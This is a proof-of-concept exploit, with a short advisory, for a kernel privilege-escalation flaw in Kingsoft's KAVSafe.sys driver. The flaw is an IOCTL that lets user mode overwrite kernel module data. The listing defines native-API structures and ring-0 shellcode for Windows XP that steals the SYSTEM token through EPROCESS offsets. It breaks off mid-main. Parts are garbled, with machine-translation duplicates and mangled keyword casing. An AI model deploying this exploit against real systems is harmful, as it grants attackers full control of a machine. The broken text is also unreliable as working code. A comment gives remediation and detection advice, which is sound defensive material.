Kavsafe.sys creates a device called DeviceKAVSafe and handles the DeviceIoControl request IoControlCode = 0x830020d4, which can overwrite arbitrary kernel module data.
Machine Translation:
Kavsafe.sys creates a device named DeviceKAVSafe and processes the DeviceIoControl request IoControlCode = 0x830020d4, which can overwrite data in any kernel module.
Test code:
VULNERABLE PRODUCTS
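/* Control code handled by KAVSafe.sys.  CTL_CODE(0x8300, 0x835, METHOD_BUFFERED,
 * FILE_ANY_ACCESS) expands to 0x830020d4, the code named in the advisory above.
 * FILE_ANY_ACCESS means the I/O manager performs no access-right check on the
 * handle for this request; whether an unprivileged caller can reach it is then
 * decided solely by the device object's security descriptor. */
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300, 0x835, METHOD_BUFFERED, FILE_ANY_ACCESS)

/* Signature of ntdll!NtQueryInformationProcess — presumably resolved with
 * GetProcAddress in main(), which is cut off in this listing. */
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(
    HANDLE ProcessHandle,
    DWORD ProcessInformationClass,
    PVOID ProcessInformation,
    ULONG ProcessInformationLength,
    PULONG ReturnLength
);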
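/* Native-API ANSI counted string (Length/MaximumLength are byte counts). */
typedef struct _STRING {
    USHORT Length;
    USHORT MaximumLength;
    PCHAR Buffer;
} STRING;
typedef STRING *PSTRING;

typedef struct _RTL_DRIVE_LETTER_CURDIR {
    USHORT Flags;
    USHORT Length;
    ULONG TimeStamp;
    STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;

/* Native-API UTF-16 counted string (Length/MaximumLength are byte counts). */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;

#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001

typedef struct _CURDIR {
    UNICODE_STRING DosPath;
    HANDLE Handle;
} CURDIR, *PCURDIR;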
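/* Process parameter block reachable from PEB->ProcessParameters.  The listing
 * had the keyword casing and struct tag mangled and the DesktopInfo member
 * garbled as "using topinfo"; the member names otherwise follow the original
 * (including the historical spelling "CurrentDirectores"). */
typedef struct _RTL_USER_PROCESS_PARAMETERS {
    ULONG MaximumLength;
    ULONG Length;
    ULONG Flags;
    ULONG DebugFlags;
    HANDLE ConsoleHandle;
    ULONG ConsoleFlags;
    HANDLE StandardInput;
    HANDLE StandardOutput;
    HANDLE StandardError;
    CURDIR CurrentDirectory;            // ProcessParameters
    UNICODE_STRING DllPath;             // ProcessParameters
    UNICODE_STRING ImagePathName;       // ProcessParameters
    UNICODE_STRING CommandLine;         // ProcessParameters
    PVOID Environment;                  // NtAllocateVirtualMemory
    ULONG StartingX;
    ULONG StartingY;
    ULONG CountX;
    ULONG CountY;
    ULONG CountCharsX;
    ULONG CountCharsY;
    ULONG FillAttribute;
    ULONG WindowFlags;
    ULONG ShowWindowFlags;
    UNICODE_STRING WindowTitle;         // ProcessParameters
    UNICODE_STRING DesktopInfo;         // ProcessParameters
    UNICODE_STRING ShellInfo;           // ProcessParameters
    UNICODE_STRING RuntimeData;         // ProcessParameters
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[RTL_MAX_DRIVE_LETTERS];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;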
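/* Leading fields of the PEB, declared only as far as ProcessParameters.  The
 * real structure continues well past this point, so this definition is only
 * usable for reading these first members through a PebBaseAddress — never
 * allocate or copy a PEB by sizeof(PEB). */
typedef struct _PEB {
    BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless
    BOOLEAN ReadImageFileExecOptions;   //
    BOOLEAN BeingDebugged;              //
    BOOLEAN SpareBool;                  //
    HANDLE Mutant;                      // INITIAL_PEB structure is also updated.
    PVOID ImageBaseAddress;
    PVOID Ldr;
    struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;
} PEB, *PPEB;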
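/* The listing had this as lowercase "kpriority", but PROCESS_BASIC_INFORMATION
 * below uses KPRIORITY; C is case-sensitive, so the name must match. */
typedef long KPRIORITY;

/* Output of NtQueryInformationProcess(ProcessBasicInformation). */
typedef struct _PROCESS_BASIC_INFORMATION {
    LONG ExitStatus;
    PVOID PebBaseAddress;
    ULONG_PTR AffinityMask;
    KPRIORITY BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;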
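/* One entry of the SystemModuleInformation query: base address, size and
 * image name of a loaded kernel module.  Field names are the PoC author's
 * own, not the documented ones. */
typedef struct {
    ULONG Unknown1;
    ULONG Unknown2;
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {
    ULONG Count;
    /* Variable-length trailer: Count entries follow, so the buffer must be
     * sized from the ReturnLength of the query, not from sizeof. */
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;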
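/* Signature of ntdll!NtQuerySystemInformation. */
typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION)(
    LONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

/* Pseudo-handle for the current process.  The listing had the parentheses
 * unbalanced ("(HANDLE) (LONG_PTR)-1)"); this is the standard form. */
#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)

/* Signature of ntdll!NtVdmControl. */
typedef LONG (WINAPI *PNT_VDM_CONTROL)(
    ULONG Service,
    PVOID ServiceData
);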
/* Ring-0 payload of the PoC — presumably what the hotpatch IOCTL
 * (IOCTL_HOTPATCH_KERNEL_MODULE above, i.e. 0x830020d4) causes the driver to
 * run; main() is cut off in this listing, so the delivery is not visible here.
 * Everything in it is hard-coded for one 32-bit Windows XP build: 0xffdff124 is
 * an absolute kernel address and the [reg + 0x..] displacements are
 * build-specific field offsets, so the block is not portable and any change to
 * those constants changes which kernel memory is read or written.
 * Review note: that brittleness is not a mitigation.  The exploitable primitive
 * is the IOCTL itself, which lets a user-mode caller have the driver overwrite
 * kernel module data; the fix belongs on the driver side (refuse the request
 * or restrict the device object's security descriptor), and the detection
 * signal is an ordinary user process opening the KAVSafe device and issuing
 * that control code. */
VOID _ declspec (naked) R0ShellCodeXP ()
{
_ Asm
{
Mov eax, 0xffdff124
Mov eax, [eax]
Mov esi, dword ptr [eax + 0x220]
Mov eax, esi
Searchxp:
Mov eax, dword ptr [eax + 0x88]
Sub eax, 0x88
Mov edx, dword ptr [eax + 0x84]
Cmp edx, 4
Jnz searchxp
Mov eax, dword ptr [eax + 0xc8]
Mov dword ptr [esi + 0xc8], eax
Ret 8
}
}
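/* Trivial user-mode function that only prints a marker.  It is referenced
 * from main(), which is cut off below, so its role in the PoC is not visible
 * here.  The listing had the call mangled as "Printf"; C is case-sensitive. */
VOID NopNop(void)
{
    printf("nop! ");
}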
# Include "malloc. h"
Int main (int argc, char * argv [])
{
Printf ("KSWebShield KAVSafe. sys <= 2010,04, 14,609"
"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept"
"2010-5-23"
"By Lincoin Press Enter ");
HKEY hkey;
WCHAR InstallPath [MAX_PATH];
DWORD datatype;
DWORD datasize = MAX_PATH * sizeof (WCHAR );
ULONG oldlen;
PVOID pOldBufferData = NULL;
If (RegOpenKey (HKEY_LOCAL_MACHINE, "SOFTWARE \ Kingsoft \ KSWSVC", & h